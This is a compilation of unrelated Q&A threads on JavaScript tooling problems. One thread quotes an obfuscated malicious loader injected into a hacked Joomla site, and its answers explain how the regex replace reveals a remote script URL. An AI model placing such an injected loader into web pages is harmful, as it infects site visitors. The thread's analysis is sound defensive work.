Can't Generate Sitemaps for sites including Javascript and JQuery - javascript

I am trying to generate a sitemap for two of my sites but both online and local software doesn't work. The site says that the root URL is a bad URL. All others, including my software WebCEO simply run and produce nothing.
I have several other sites for which the sitemap generators work well. These are the only two sites I have that include JavaScript and jQuery - hence the tags.
It's probably a stupid error by me but I'm really baffled and could certainly use some help.
It's worth saying that I've just had WebCEO produce an error saying that there is a script error (a missing ')' on line 2459). There are 439 lines of code so it occurs in one of the includes but more likely that I've got an extra opening '(' in my code. The sites work ok though.

Offhand I did not encounter any problems using A1 Sitemap Generator (You can add support for searching for links in Javascript in "Scan website | Crawler options" if you disable "easy mode")
The only thing I can think of causing problems (not that I encountered them) would be if you used AJAX somehow. (At least if you did not also then implement Google's proposed solution to that.)


Translating minicart and other javascript related strings in magento 2.1.3

I am learning magento 2, i have started with basics like creating module, then a theme.
Since magento does not come with slovak language i want to do some translation on frontend and later on backend.
I have succeed translating frontend where no javascript / knockout template is used, by placing sk_SK.csv into company/themename/i18n.
I have read about issue on github that in magento 2.0 translation of javascript strings does not work using this method, so i have upgraded to latest version (2.1.3), and its still not working.
I have checked vendor/magento-checkout/i18n/ where the ex. string "Go to Checkout" is defined. So I have tried the override method used also for overriding templates (created company/themename/Magento_Checkout/i18n/sk_SK.csv) and placed the translation here. it does not worked also.
Note: After each change i delete the static folder and run the command to generate static content for sk_SK then i clean the cache and flush the cache, in browser i do hard reload with cleaning cache.
Yes there are lot of topics on github, stackoverflow, docs... but i do not understand them, these answers are written i thing for super professionals.
Note 2: Theoretically i can hard-code slovak language into web/minicart/content.html (not sure if path is right) by overriding this file. But this is not solution for possible multi-language website.
Note 3:
I have did also an export using i18n, but the output is messed up. like "Hello "World"!","something" same quotes in quotes without escape.its pain to open in any excel kind of app (partly succeed with libreoffice calc) because it has long string and too much strings not friendly for developers or people who will do the translation.
What kind of answer i want to receive is like this:
1. Copy this file here, because..[explanation]
2. Edit/Add/Whatever here, because....
3. etc...
Why? I want to learn and not just copy paste.
Thank you

Aptana //novalidate option

I'm writing Processing.js code using Eclipse (with the Aptana plugin), and I'm a little confused by this option in the Javascript preferences:
Enable error filtering inside //novalidate comments
Using Processing.js allows me (and occasionally forces me - for example, it uses the Java "void" instead of the Javascript "function" for method declarations) to do some funky things to javascript syntax that the validator doesn't like. I've got a bunch of error messages that I'd like to silence, but I'd rather use the Eclipse editor because the rest of my site is there.
I've tried sticking "//novalidate" before, after, after the semicolon on the same line, and even at the beginning of the file, but it has no effect. I've also tried adding exclude rules in Preferences -> Validation, but that doesn't seem to do anything, nor does turning off "Javascript problems" in Problems -> Configure Contents... (which I'd like to avoid, because I'm doing regular javascript elsewhere on my site). I can't find any documentation for "//novalidate" on the Aptana website - does anyone have any idea how to use this properly?
Thanks in advance.
Have you tried Aptana Support methods?

How does this site infecting script work?

My Joomla! website has been repeatedly hacked into. Someone, somehow, managed to inject the following rubbish into the key php scripts, but I mean not to talk about configuring Joomla. The site is not visited much (at times I fear I might be the only visitor to that site...) and I don't care much to have the site back up and running. I'll handle that eventually.
My question is, how does this rubbish work? I look at it and I just don't see how does this manage to do any harm? What it does is it tries to download a PDF file called ChangeLog.pdf, which is infected with a trojan and after opening will freeze up your Acrobat and wreak havoc on your machine. How does it do that, I don't know, I don't care. But how does the following piece of script invoke the download?
<script>/*Exception*/ document.write('<script src='+'h#^(t#)((t$&#p#:)&/!$/)#d$y#^#$n#$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^#g))!a#m##$e&$s^##!t##($!o#$p(.&#c&)#(o$m)).!$m$)y#(b#e()s&$t$#y&o$&(u#)$x&&^(i)-#^c!!&n$#.(#g)$e#(^n&!u(i&#&n(e&(!h&o#&^&l^$(l)&y$(##w!o#!((o#d&^.^#)r$#^u!!$:(##&8#)(0$8#&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c#o!&^m#&/&(s&$(o!f&!t#&o!!n)&i$&c!.#^^c)!$o##((m##/$^!g#^o$^&o&#g!l)###!e&.))c!)(o###^!m(&/^^l#^#i##(v&#e&)!$j^!a#$s#m!i)n$.!$c&$o)#$m^/#$v&i^d^()e(!o&&s#(z(#)^.#)c$&o^m)$)^/#$'.replace(/#|\$|#|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
ESET has detected this code as JS/TrojanDownloader.Agent.NRO trojan
Notice the replace call after the giant messy string: .replace(/#|\$|#|\^|&|\(|\)|\!/ig, '').
It removes most of the special characters, turning it into a normal URL:
(I manually changed http: to evil:)
Note that the regex could have been simplified to .replace(/[#$#^&()!]/ig, '')
If you look at the script, you'll see that it's a very simple script that injects a hidden IFRAME containing the path /index.php?ys from the same domain.
I requested that page in Fiddler, and it had no content.
These answers might help you understand the nature of the malicious JavaScript code but what you should be looking for is a way to close the loophole inherant in the Joomla engine. Pre-packaged frameworks are prone to loopholes, either intentional or unintentional, especially when you take into consideration that they are engineered to work on unix, mac and windows environments.
My work requires I run many domains, applications and frameworks on many types of servers and systems for clients and myself. Over time I've seen more and more bots crawling these systems looking for known loopholes/entrances by-way of back-door entrances created by those frameworks. Good thing when I use any type of framework, which I seldom do, I make sure to rename most if not the entire file structure to rid myself of those pesky loopholes/back-doors. At the very least you can rename directories which will throw off most bots, but my way is to completely eliminate references that give clues as to the nature of the framework, which includes renaming of the entire file structure not just directories. Always keep a map of the new naming conventions relative to the old naming conventions in order to make adding plug-ins to your base framework a snap. Once you get the hang of this you can go as far as programatically renaming the entire framework filestructure for quicker results, this is especially useful when having to deal with clients needing to be able to update their framework with plug-ins and the like.
It just does a regex replace on the script url to give you
NOTE: DO NOT FOLLOW THE BELOW LINK (inserted ** to deter the copy-pasters)
as the src
It uses the replace function to replace the rubbish chars using regex, nothing wrong with the code:
........replace(/#|\$|#|\^|&|\(|\)|\!/ig, '')
Its load script from
And that script load iframe from with visibility hidden
When you read the whole thing, you find that it is a string followed by a replace command.
My two cents. Have you / can you install a Joomla backup tool such as Joomlapack?
I've set it to run via a CHRON script to keep the goods handy in case the muggers get to mugging.
What version of Joomla are you running?
1.0.X versions aren't being updated any longer, and it's age is really starting to show. You owe it to yourself to do a backup and plan to upgrade to 1.5 and anticipate the wonders of 1.6

ASP.NET MVC markup in VS2008 script has warnings with "expected expression"

I've searched SO and have been unable to find this question asked before, but I can't believe I'm the only one running into it. If this is a duplicate, please point me to the original question.
In VS2008, I have some ASP.NET MVC markup in a script section on some of my pages. I end up getting "expected expression" warning squiggles on the ASP.NET MVC markup even though the jQuery/JavaScript in the preceding code is valid. It only happens on the markup.
This doesn't prevent the page from rendering, everything works fine. It is more an annoyance than anything else. I've installed VS2k8 SP1 along with the Intellisense hotfix and it still happens. It also happens whether I'm running R# 4.5 or the 5.0 EAP.
Suggestions or should I just pick my battles when it comes to VS 2008?
Screenshot: My apologies, I could have sworn I added a screenshot to this question.
The VS designer is not good at handling cases where your markup jumps between server-side and client-side script.
Sometimes adding <%=""%> at the top helps, as per this post:
The VS designer also seems slow to pick up changes, re-parse and remove error squiggles.
In your case I think it's trying to parse that line as Javascript but it's obviously not. If you're nuts about removing the errors you would have to re-factor the code, eg generate the entire JS script as a server-side string and write it out.
I've learned to view error squiggles as advice only, and once the page is stable and working just ignore them.

Problem porting WordPress Editor to a non-WP application

I like the look and feel of the WordPress editor (version 2.7), and I would like to use it in another web application that is written in ASP.NET. I've used TinyMCE before, and I've even extended it in the past. However, I can't seem to get the Wordpress configuration to work!
I've downloaded the entire WordPress package and taken the TinyMCE code (from the "js" folder) and put it in my web site. It ends up giving me an error on the following line of tiny_mce.js
return f.apply(s||this,,2))
'undefined' is null or not an object.
Now, I've carefully made sure that the steps of execution are identical with the WordPress demonstration site that I've based this from.
I'm not a Javascript newbie (at all), but I can't seem to figure out why this is not working. Has anybody tried to do this before? What am I missing?
A demo of what I am talking about is here (username="admin", password="demo"). View the source, I have the three parts of Javascript that are (seemingly) required to power the editor.
Something of a stab in the dark, but I'm suspecting that there's a dependency on WP's prototype.js and you didn't bring that over with TinyMCE.
If you are able to determine which bit is undefined that might give you a clue. I tried looking at the demo with firebug, but tinymce.js was all one line, so I gave up trying to find that code.
Try putting in either some console.log() if you have firebug, or alert()s before that line, and try to see what f,s,this,arguments etc are when yu get the error, then do the same thing with a vanilla WP install and see the difference?
I suggest including the tiny_mce_src.js istead of the minified version, this way you can use firebug to debug and receive helpfull information.

